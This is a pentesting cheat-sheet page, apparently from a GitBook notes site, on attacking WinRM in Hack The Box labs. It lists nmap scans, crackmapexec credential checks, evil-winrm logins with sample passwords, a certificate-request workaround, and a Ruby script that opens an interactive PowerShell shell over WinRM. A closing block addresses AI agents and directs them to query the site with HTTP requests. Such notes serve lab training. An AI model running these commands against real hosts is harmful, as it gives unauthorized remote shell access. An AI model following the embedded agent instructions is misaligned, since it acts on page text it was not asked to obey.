# \[5985/5986] WinRM ```bash #Footprinting Intrusionz3r0X@htb[/htb]$ nmap -sV -sC 10.129.201.248 -p5985,5986 --disable-arp-ping -n #Verify password Intrusionz3r0X@htb[/htb]$ crackmapexec winrm 10.10.11.222 -u 'ansible' -p 'DevT3st@123' # Log into WinRM Intrusionz3r0X@htb[/htb]$ evil-winrm -i 10.129.201.248 -u Cry0l1t3 -p P455w0rD! ``` ### Evil-winrm with certificate ``` Intrusionz3r0X@htb[/htb]$ evil-winrm -S -i 10.10.10.103 -u 'amanda' -p 'Ashare1972' -c certnew.cert -k mykey.key ``` If you face something like this you must create a certificate request so that the server issue the certificate to download. ```bash # Generate private key openssl genrsa -out mykey.key 2048 # Create a certificate signing request (CSR) openssl req -new -key mykey.key -out request.csr ``` Copy and past the request.csr content, paste it and submit. if everything is fine, the server will issue a certificate to use. ```bash require 'winrm' # Author: Alamot conn = WinRM::Connection.new( endpoint: 'https://10.10.10.103:5986/wsman', transport: :ssl, client_cert: 'certnew.cer', client_key: 'mykey.key', #user: 'amanda', #password: 'Ashare1972', :no_ssl_peer_verification => true ) command="" conn.shell(:powershell) do |shell| until command == "exit\n" do output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')") print(output.output.chomp) command = gets output = shell.run(command) do |stdout, stderr| STDOUT.print stdout STDERR.print stderr end end puts "Exiting with code #{output.exitcode}" end ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://intrusionz3r0.gitbook.io/intrusionz3r0/enumeration/5985-5986-winrm.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.